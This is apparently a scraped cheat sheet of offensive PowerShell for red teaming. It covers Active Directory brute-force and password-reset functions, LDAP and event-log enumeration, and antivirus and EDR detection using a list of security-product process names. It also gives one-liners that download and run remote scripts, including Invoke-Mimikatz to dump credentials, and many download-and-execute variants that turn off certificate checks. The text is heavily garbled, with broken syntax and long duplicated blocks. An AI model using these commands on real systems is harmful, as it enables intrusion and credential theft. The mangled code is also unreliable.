Red Teaming PowerShell (Commands and Coding Methods) function Run-As {
param (
[Parameter (Mandatory = $True )]
[string ]$Username ,
[Parameter (Mandatory = $True )]
[string ]$Password ,
[Parameter (Mandatory = $True )]
[string ]$Process
)
PROCESS {
$Secure = ConvertTo-SecureString $Password - AsPlainText - Force
$Cred = New-Object System.Management.Automation.PSCredential($Username , $Secure )
Start-Process - FilePath $Process - Credential $Cred
}
}function Search-EventForUser {
param (
[Parameter (Mandatory = $True )]
[string ]$Username
)
PROCESS {
Get-WinEvent - FilterHashtable @ {LogName = ' Security' ID = 4624 } | Where-Object { $_.Properties [5 ].Value -match $Username }
}
}function Search-EventForProcess {
param (
[Parameter (Mandatory = $True )]
[string ]$Process
)
PROCESS {
Get-WinEvent - FilterHashtable @ {LogName = ' Security' ID = 4688 } | Where-Object { $_.Properties [6 ].Value -match $Process }
}
}function Search-EventForService {
param (
[Parameter (Mandatory = $True )]
[string ]$Service
)
PROCESS {
Get-WinEvent - FilterHashtable @ {LogName = ' Security' ID = 7045 } | Where-Object { $_.Properties [5 ].Value -match $Service }
}
}Search-EventForUserAndProcess function Search-EventForUserAndProcess {
param (
[Parameter (Mandatory = $True )]
[string ]$Username ,
[Parameter (Mandatory = $True )]
[string ]$Process
)
PROCESS {
Get-WinEvent - FilterHashtable @ {LogName = ' Security' ID = 4624 } | Where-Object { $_.Properties [5 ].Value -match $Username } | ForEach-Object {
$EventID = $_.ID
$EventRecordID = $_.RecordId
$EventTimeCreated = $_.TimeCreated
$EventProcessID = $_.Properties [6 ].Value
$EventProcessName = $_.Properties [8 ].Value
$EventLogonType = $_.Properties [10 ].Value
$EventWorkstationName = $_.Properties [13 ].Value
$EventIpAddress = $_.Properties [18 ].Value
if ($EventProcessName -match $Process ) {
Write-Host " Event ID: $EventID " Write-Host " Event Record ID: $EventRecordID " Write-Host " Event Time Created: $EventTimeCreated " Write-Host " Event Process ID: $EventProcessID " Search-EventForUser (Mr.Un1k0d3r) # Mr.Un1k0d3r RingZer0 Teamfunction Search-EventForUser {
param (
[Parameter (Mandatory = $True , ValueFromPipeline = $true )]
[string ]$TargetUser ,
[Parameter (Mandatory = $False )]
[string ]$ComputerName = (Get-Item env:COMPUTERNAME).Value,
[Parameter (Mandatory = $False )]
[switch ]$FindDC = $False ,
[Parameter (Mandatory = $False )]
[switch ]$FullMessage = $False ,
[Parameter (Mandatory = $False )]
[string ]$Username ,
[Parameter (Mandatory = $False )]
[string ]$Password
)
BEGIN {
if ($Username -ne " " $SecurePassword = ConvertTo-SecureString $Password - AsPlainText - Force
$Creds = New-Object - TypeName System.Management.Automation.PSCredential - ArgumentList $Username , $SecurePassword
}
}
PROCESS {
[System.Collections.ArrayList ]$dcs = @ ()
if ($FindDC ) {
Write-Output " [+] Enumerating all the DCs" ForEach ($dc in [DirectoryServices.ActiveDirectory.Domain ]::GetCurrentDomain().DomainControllers) {
Write-Output " [+] DC found: $ ( $dc.Name ) " $dcs.Add ($dc.Name ) | Out-Null
}
} else {
$dcs.Add ($ComputerName ) | Out-Null
}
ForEach ($dc in $dcs ) {
ForEach ($item in $TargetUser ) {
Write-Output " [+] Parsing $ ( $dc ) Logs looking for $ ( $item ) " if ($Creds ) {
Write-Output " [*] Remotely authenticated as $ ( $Username ) " $xmlFilter = " <QueryList><Query Id="" 0"" Path="" Security"" ><Select Path="" Security"" >*[System[(EventID=4624)] and EventData[Data[@Name="" TargetUserName"" ]="" $ ( $item ) "" ]]</Select></Query></QueryList>" $data = Get-WinEvent - FilterXml $xmlFilter - ComputerName $dc - ErrorAction SilentlyContinue - Credential $Creds | Select Message;
} else {
$xmlFilter = " <QueryList><Query Id="" 0"" Path="" Security"" ><Select Path="" Security"" >*[System[(EventID=4624)] and EventData[Data[@Name="" TargetUserName"" ]="" $ ( $item ) "" ]]</Select></Query></QueryList>" $data = Get-WinEvent - FilterXml $xmlFilter - ComputerName $dc - ErrorAction SilentlyContinue | Select Message;
}
if ($data ) {
ForEach ($entry in $data ) {
Write-Output " `n [+] Event found" If ($FullMessage ) {
Write-Output $entry.Message
} Else {
ForEach ($Line in $entry.Message.Split (" `n " $Line | Select-String - Pattern " Account Name:" $Line | Select-String - Pattern " Account Domain:" $Line | Select-String - Pattern " Security ID:" $Line | Select-String - Pattern " Source Network Address:" $Line | Select-String - Pattern " Workstation Name:" $Line | Select-String - Pattern " Process Name:" else {
Write-Output " [-] No event found on $ ( $dc ) ..." END {
Write-Output " [+] Process completed..." function AD-PasswordRestore {
param (
[Parameter (Mandatory = $True )]
[string ]$Username ,
[Parameter (Mandatory = $True )]
[string ]$Password ,
[Parameter (Mandatory = $True )]
[string ]$Domain ,
[Parameter (Mandatory = $False )]
[switch ]$NoErrorReport
)
BEGIN {
$ErrorActionPreference = " SilentlyContinue" PROCESS {
$PasswordSecure = ConvertTo-SecureString - String $Password - AsPlainText - Force
Set-ADAccountPassword - Identity $Username - NewPassword $PasswordSecure - Reset - ErrorAction SilentlyContinue
Set-ADUser - Identity $Username - Enabled $True - ErrorAction SilentlyContinue
}
END {
if (-not $NoErrorReport ) {
if ($? ) {
Write-Output " [+] Password restored successfully..." else {
Write-Output " [-] Password restore failed..." Invoke-ADPasswordBruteForce function Invoke-ADPasswordBruteForce {
param (
[Parameter (Mandatory = $True )]
[string ]$Username ,
[Parameter (Mandatory = $True )]
[string ]$PasswordList ,
[Parameter (Mandatory = $False )]
[switch ]$NoErrorReport
)
BEGIN {
$ErrorActionPreference = " SilentlyContinue" PROCESS {
$PasswordArray = Get-Content $PasswordList
foreach ($Password in $PasswordArray ) {
$PasswordSecure = ConvertTo-SecureString - String $Password - AsPlainText - Force
Set-ADAccountPassword - Identity $Username - NewPassword $PasswordSecure - Reset - ErrorAction SilentlyContinue
Set-ADUser - Identity $Username - Enabled $True - ErrorAction SilentlyContinue
}
}
END {
if (-not $NoErrorReport ) {
if ($? ) {
Write-Output " [+] Password restored successfully..." else {
Write-Output " [-] Password restore failed..." Invoke-ADPasswordBruteForce (Mr-Un1k0d3r) Function Invoke-ADPasswordBruteForce {
param (
[Parameter (Mandatory = $True , ValueFromPipeline = $true )]
[string ]$Username ,
[Parameter (Mandatory = $True )]
[string ]$Password ,
[Parameter (Mandatory = $False )]
[string ]$Domain = (Get-Item env:USERDOMAIN).Value
)
BEGIN {
Write-Output " [+] Brute forcing users against the "" $ ( $Domain ) "" domain using the password "" $ ( $Password ) "" " PROCESS {
Add-Type - AssemblyName System.DirectoryServices.AccountManagement
ForEach ($User in $Username ) {
Try {
$Context = [System.DirectoryServices.AccountManagement.ContextType ]::Domain
$PrincipalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($Context , $Domain )
If ($PrincipalContext.ValidateCredentials ($User , $password ) -eq $True ) {
Write-Output " [+] $ ( $User ) password is $ ( $Password ) " Catch {
Write-Output " [-] Error reaching the server. Aborting" exit
}
}
}
END {
Write-Output " [+] Process completed..." function Ldap-Query {
param (
[Parameter (Mandatory = $True )]
[string ]$Filter ,
[Parameter (Mandatory = $True )]
[string ]$Property ,
[Parameter (Mandatory = $False )]
[switch ]$NoErrorReport
)
BEGIN {
Write-Output " [+] Starting process..." PROCESS {
}
END {
Write-Output " [+] Process completed..." function Ldap-GetProperty {
param (
[Parameter (Mandatory = $True , ValueFromPipeline = $True )]
[string ]$Filter ,
[Parameter (Mandatory = $True )]
[string ]$Property ,
[Parameter (Mandatory = $False )]
[switch ]$NoErrorReport
)
BEGIN {
Write-Output " [+] Starting process..." PROCESS {
}
END {
Write-Output " [+] Process completed..." function Ldap-Query {
param (
[Parameter (Mandatory = $True , ValueFromPipeline = $True )]
[string ]$Filter
)
BEGIN {
}
PROCESS {
$Domain = New-Object System.DirectoryServices.DirectoryEntry
$DirSearch = New-Object System.DirectoryServices.DirectorySearcher
$DirSearch.SearchRoot = $Domain
$DirSearch.PageSize = 100
$DirSearch.Filter = $Filter
$DirSearch.SearchScope = " Subtree" ForEach ($Item in $DirSearch.FindAll ()) {
$Data = $Item.Properties
Write-Output $Data
}
}
}Ldap-GetProperty (Mr-Um1k0d3r) function Ldap-GetProperty {
param (
[Parameter (Mandatory = $True , ValueFromPipeline = $True )]
[string ]$Filter ,
[Parameter (Mandatory = $True )]
[string ]$Property ,
[Parameter (Mandatory = $False )]
[switch ]$NoErrorReport = $False
)
BEGIN {
$Output = @ ()
}
PROCESS {
$Domain = New-Object System.DirectoryServices.DirectoryEntry
$DirSearch = New-Object System.DirectoryServices.DirectorySearcher
$DirSearch.SearchRoot = $Domain
$DirSearch.PageSize = 100
$DirSearch.Filter = $Filter
$DirSearch.SearchScope = " Subtree" ForEach ($Item in $DirSearch.FindAll ()) {
$Data = $Item.Properties
$Element = New-Object - TypeName PSObject
ForEach ($Attribute in $Property.Split (" ," Try {
$Element | Add-Member - MemberType NoteProperty - Name $Attribute - Value ([string ]$Data .$Attribute )
} Catch {
$Element | Add-Member - MemberType NoteProperty - Name $Attribute - Value " " if (! $NoErrorReport ) {
Write-Output " [-] Property not found" $Output += $Element
}
return $Output
}
}LDAP Computers Information function Dump-Computer {
param (
[Parameter (Mandatory = $True , ValueFromPipeline = $True )]
[string ]$ComputerName
)
BEGIN {
$Output = @ ()
}
PROCESS {
$Domain = New-Object System.DirectoryServices.DirectoryEntry
$DirSearch = New-Object System.DirectoryServices.DirectorySearcher
$DirSearch.SearchRoot = $Domain
$DirSearch.PageSize = 100
$DirSearch.Filter = " (name=$ComputerName )" $DirSearch.SearchScope = " Subtree" ForEach ($Item in $DirSearch.FindAll ()) {
$Data = $Item.Properties
$Element = New-Object - TypeName PSObject
}
}
PROCESS {
ForEach ($Computer in $ComputerName ) {
Write-Output $Computer
}
}
}Dump-Computers (Mr-Un1k0d3r) function Dump-Computers {
PROCESS {
Ldap- GetProperty - Filter " (&(objectCategory=Computer))" - Property " name" - NoErrorReport | Format-Table - Wrap - AutoSize
}
END {
Write-Output " [+] Process completed..." LDAP User & Group Information function Dump-UserGroup {
param (
[Parameter (Mandatory = $True , ValueFromPipeline = $True )]
[string ]$UserName
)
BEGIN {
}
PROCESS {
ForEach ($User in $UserName ) {
Write-Output " Dumping $ ( $User ) Groups" Write-Output " -----------------------------------------------" - GetProperty - Filter " (&(objectCategory=User)(samaccountname=$ ( $User ) ))" - Property memberof | fl
}
}
END {
Write-Output " [+] Process completed..." function DumpAll-UserInfo {
param (
[Parameter (Mandatory = $True , ValueFromPipeline = $True )]
[string ]$UserName
)
BEGIN {
}
PROCESS {
ForEach ($User in $UserName ) {
Write-Output " Dumping $ ( $User ) " Write-Output " -----------------------------------------------" - Query - Filter " (&(objectCategory=User)(samaccountname=$ ( $User ) ))" END {
Write-Output " [+] Process completed..." Check, Information & Enum # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ privesc/ Check- EDR.ps1);Check- EDR
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Privesc/ Check- EDR.ps1);Check- EDR
iex (iwr https:// raw.githubusercontent.com / BankSecurity/ Red_Team/ master/ Discovery/ Check_EDR_Presence.ps1);Invoke-EDRCheck # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ privesc/ Check- AV.ps1);Check- AV
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Privesc/ Check- AV.ps1);Check- AV
iex (iwr https:// raw.githubusercontent.com / BankSecurity/ Red_Team/ master/ Discovery/ Check_AV_Presence.ps1);Invoke-AVCheck Get-AVProcesses / Get-McafeeLogs / Get-AVInfo function Get-AVInfo {
Write-Verbose " Enumerating installed AV product..." $AntiVirusProduct = Get-WmiObject - Namespace " root\SecurityCenter2" - Class AntiVirusProduct - ComputerName $env: computername
switch ($AntiVirusProduct.productState ) {
" 262144" $defstatus = " Up to date" $rtstatus = " Disabled" " 262160" $defstatus = " Out of date" $rtstatus = " Disabled" " 266240" $defstatus = " Up to date" $rtstatus = " Enabled" " 266256" $defstatus = " Out of date" $rtstatus = " Enabled" " 393216" $defstatus = " Up to date" $rtstatus = " Disabled" " 393232" $defstatus = " Out of date" $rtstatus = " Disabled" " 393488" $defstatus = " Out of date" $rtstatus = " Disabled" " 397312" $defstatus = " Up to date" $rtstatus = " Enabled" " 397328" $defstatus = " Out of date" $rtstatus = " Enabled" " 397584" $defstatus = " Out of date" $rtstatus = " Enabled" " 397568" $defstatus = " Up to date" $rtstatus = " Enabled" " 393472" $defstatus = " Up to date" $rtstatus = " Disabled" default {$defstatus = " Unknown" $rtstatus = " Unknown" # Create hash-table$ht = @ {}
$ht.Computername = $env: computername
$ht.Name = $AntiVirusProduct.displayName
$ht .' Product GUID' = $AntiVirusProduct.instanceGuid
$ht .' Product Executable' = $AntiVirusProduct.pathToSignedProductExe
$ht .' Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe
$ht .' Definition Status' = $defstatus
$ht .' Real-time Protection Status' = $rtstatus
# Convert to PS object and then format as a string for file output$Output = New-Object - TypeName PSObject - Property $ht # |Format-ListReturn $Output
}
function Get-McafeeLogs {
Write-Verbose " Enumerating Mcafee AV events..." # Get events from the last two weeks$date = (get-date ).AddDays(-14 )
$ProviderName = " McLogEvent" # Try to get McAfee AV event logsTry {
$McafeeLogs = Get-WinEvent - FilterHashTable @ { logname = " Application" StartTime = $date ; ProviderName = $ProviderName ; }
$McafeeLogs | Select-Object - First 50 ID, Providername, DisplayName, TimeCreated, Level, UserID, ProcessID, Message
}
Catch {
Write-Verbose " [-] Error getting McAfee AV event logs! $ ( $Error [0 ]) `n " function Get-AVProcesses {
$processes = Get-Process
$avlookuptable = @ {
mcshield = " McAfee AV" FrameworkService = " McAfee AV" naPrdMgr = " McAfee AV" windefend = " Windows Defender AV" MSASCui = " Windows Defender AV" msmpeng = " Windows Defender AV" msmpsvc = " Windows Defender AV" WRSA = " WebRoot AV" savservice = " Sophos AV" TMCCSF = " Trend Micro AV" " symantec antivirus" = " Symantec AV" ccSvcHst = " Symantec Endpoint Protection" TaniumClient = " Tanium" mbae = " MalwareBytes Anti-Exploit" parity = " Bit9 application whitelisting" cb = " Carbon Black behavioral analysis" " bds-vision" = " BDS Vision behavioral analysis" Triumfant = " Triumfant behavioral analysis" CSFalcon = " CrowdStrike Falcon EDR" ossec = " OSSEC intrusion detection" TmPfw = " Trend Micro firewall" dgagent = " Verdasys Digital Guardian DLP" kvoop = " Forcepoint and others" xagt = " FireEye Endpoint Agent" " 360tray" = " 360tray" " 360safe" = " 360safe" " 360sd" = " 360sd" " 360safebox" = " 360safebox" " 360tray" = " 360tray" " 360safe" = " 360safe" " 360sd" = " 360sd" " 360safebox" = " 360safebox" " avp" = " Kaspersky" " avg" = " AVG" " ashdisp" = " Avast" " ashserv" = " Avast" " avguard" = " Avast" " avpui" = " Kaspersky" " avpmond" = " Kaspersky" " avpm" = " Kaspersky" " avgctrl" = " AVG" " avgemc" = " AVG" " avgemc" = " AVG" " avgtray" = " AVG" " mcshield" = " McAfee" " mctskmgr" = " McAfee" " mctray" = " McAfee" " mpftray" = " McAfee" " msmpeng" = " McAfee" " msmptray" = " McAfee" " norton" = " Norton" " outpost" = " Outpost" " safeweb" = " Symantec" " symantec" = " Symantec" " symtray" = " Symantec" " windefend" = " Windows Defender" " winvdf" = " Windows Defender" ForEach ($process in $processes ) {
ForEach ($key in $avlookuptable.keys ){
if ($process.ProcessName -match $key ){
New-Object - TypeName PSObject - Property @ {
AVProduct = ($avlookuptable ).Get_Item($key )
ProcessName = $process.ProcessName
PID = $process.ID
}
}
}
}
} # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ privesc/ Check- Firewall.ps1);Check- Firewall
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Privesc/ Check- Firewall.ps1);Check- Firewall
iex (iwr https:// raw.githubusercontent.com / BankSecurity/ Red_Team/ master/ Discovery/ Check_Firewall_Presence.ps1);Invoke-FirewallCheck # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ privesc/ Check- Persistence.ps1);Check- Persistence
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Privesc/ Check- Persistence.ps1);Check- Persistence
iex (iwr https:// raw.githubusercontent.com / BankSecurity/ Red_Team/ master/ Discovery/ Check_Persistence.ps1);Invoke-PersistenceCheck # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ privesc/ Check- Privileges.ps1);Check- Privileges
iex (iwr https:// raw.githubusercontent.com / PowerShellMafia/ PowerSploit/ master/ Privesc/ Check- Privileges.ps1);Check- Privileges
iex (iwr https:// raw.githubusercontent.com / BankSecurity/ Red_Team/ master/ Discovery/ Check_Privileges.ps1);Invoke-PrivilegeCheck Dump Credentials with Mimikatz # Recommend// raw.githubusercontent.com / EmpireProject/ Empire/ master/ data / module_source/ privesc/ Invoke-Mimikatz.ps1 );Invoke-Mimikatz - DumpCreds
IEX (New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/BankSecurity/Red_Team/master/Discovery/Invoke-Mimikatz.ps1' Invoke-Mimikatz - DumpCredsDownload a file from the internet Invoke-WebRequest - Uri " http://example.com/file.exe" - OutFile " C:\path\to\file.exe" Download a file using BITS (Background Intelligent Transfer Service) Start-BitsTransfer - Source " http://example.com/file.exe" - Destination " C:\path\to\file.exe" Download a file using the System.Net.WebClient class $webclient = New-Object System.Net.WebClient
$webclient.DownloadFile (" http://example.com/file.exe" , " C:\path\to\file.exe" Download a file using the System.Net.HttpWebRequest class $request = [System.Net.HttpWebRequest ]::Create(" http://example.com/file.exe" $response = $request.GetResponse ()
$stream = $response.GetResponseStream ()
$reader = New-Object System.IO.StreamReader($stream )
$reader.ReadToEnd () | Out-File " C:\path\to\file.exe" $reader.Close ()
$stream.Close ()
$response.Close ()Download a file using the Invoke-WebRequest cmdlet with a proxy server $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = [System.Net.CredentialCache ]::DefaultCredentials
$webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.DownloadFile (" http://example.com/file.exe" , " C:\path\to\file.exe" Download a file using the Invoke-WebRequest cmdlet with a proxy server and credentials for the proxy server $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.DownloadFile (" http://example.com/file.exe" , " C:\path\to\file.exe" Download a file using the Invoke-WebRequest cmdlet with a proxy server and credentials for the proxy server and the target server $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.DownloadFile (" http://example.com/file.exe" , " C:\path\to\file.exe" Download a file using the Invoke-WebRequest cmdlet with a proxy server and credentials for the proxy server and the target server $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.DownloadFile (" http://example.com/file.exe" , " C:\path\to\file.exe" Download a file using the Invoke-WebRequest cmdlet with a proxy server and credentials for the proxy server and the target server $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.DownloadFile (" http://example.com/file.exe" , " C:\path\to\file.exe" Download a file using the Invoke-WebRequest cmdlet with a proxy server and credentials for the proxy server and the target server $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.DownloadFile (" http://example.com/file.exe" , " C:\path\to\file.exe" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object iwr http:// example.com / script.ps1 - OutFile script.ps1; iex .\script.ps1
IEX((new-object net.webclient).downloadstring(' http://example.com/script.ps1' new-object net.webclient).downloadstring(' http://example.com/script.ps1' // example.com / script.ps1)) Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) iex (iwr http:// example.com / script.ps1 - UseBasicParsing) Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth iex (iwr http:// username:password@example.com / script.ps1 - UseBasicParsing) Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.DownloadString (" http://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL & UserAgent $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.UserAgent = " Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
$webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL & UserAgent & Proxy Bypass $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.UseDefaultCredentials = $true
$webclient.UserAgent = " Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" $webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL & UserAgent & Proxy Bypass & Proxy Authentication & Proxy Authentication Credentials $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.UseDefaultCredentials = $true
$webclient.UserAgent = " Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" $webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL & UserAgent & Proxy Bypass & Proxy Authentication & Proxy Authentication Credentials $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.UseDefaultCredentials = $true
$webclient.UserAgent = " Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" $webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL & UserAgent & Proxy Bypass & Proxy Authentication & Proxy Authentication Credentials $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.UseDefaultCredentials = $true
$webclient.UserAgent = " Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" $webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL & UserAgent & Proxy Bypass & Proxy Authentication & Proxy Authentication Credentials $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.UseDefaultCredentials = $true
$webclient.UserAgent = " Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" $webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL & UserAgent & Proxy Bypass & Proxy Authentication & Proxy Authentication Credentials $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.UseDefaultCredentials = $true
$webclient.UserAgent = " Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" $webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL & UserAgent & Proxy Bypass & Proxy Authentication & Proxy Authentication Credentials $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.UseDefaultCredentials = $true
$webclient.UserAgent = " Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" $webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL & UserAgent & Proxy Bypass & Proxy Authentication & Proxy Authentication Credentials $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.UseDefaultCredentials = $true
$webclient.UserAgent = " Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" $webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with iwr & IEX Object (without OutFile) & Basic Auth & Proxy & SSL & UserAgent & Proxy Bypass & Proxy Authentication & Proxy Authentication Credentials $proxy = New-Object System.Net.WebProxy(" http://proxyserver:port" $proxy.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient = New-Object System.Net.WebClient
$webclient.Proxy = $proxy
$webclient.Credentials = New-Object System.Net.NetworkCredential(" username" , " password" $webclient.UseDefaultCredentials = $true
$webclient.UserAgent = " Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" $webclient.ServerCertificateValidationCallback = {$true }
iex ($webclient.DownloadString (" https://example.com/script.ps1" Download & Execute PS1 Script for Invoque-* with IEX Object IEX (New-Object Net.WebClient).DownloadString(" http://example.com/script.ps1" Download & Execute PS1 Script for Invoke-* with Invoke-WebRequest cmdlet Invoke-WebRequest - Uri " http://example.com/script.ps1" - OutFile " C:\path\to\script.ps1" Download & Execute PS1 Script for Invoke-* with Invoke-Expression cmdlet Invoke-WebRequest - Uri " http://example.com/script.ps1" - OutFile " C:\path\to\script.ps1" Invoke-Expression (Get-Content C:\path\to\script.ps1)wget http:// example.com / file.exe - OutFile C:\path\to\file.exe curl - o C:\path\to\file.exe http:// example.com / file.exe Download a file using the System.Net.HttpWebRequest class $request = [System.Net.HttpWebRequest ]::Create(" http://example.com/file.exe" $response = $request.GetResponse ()
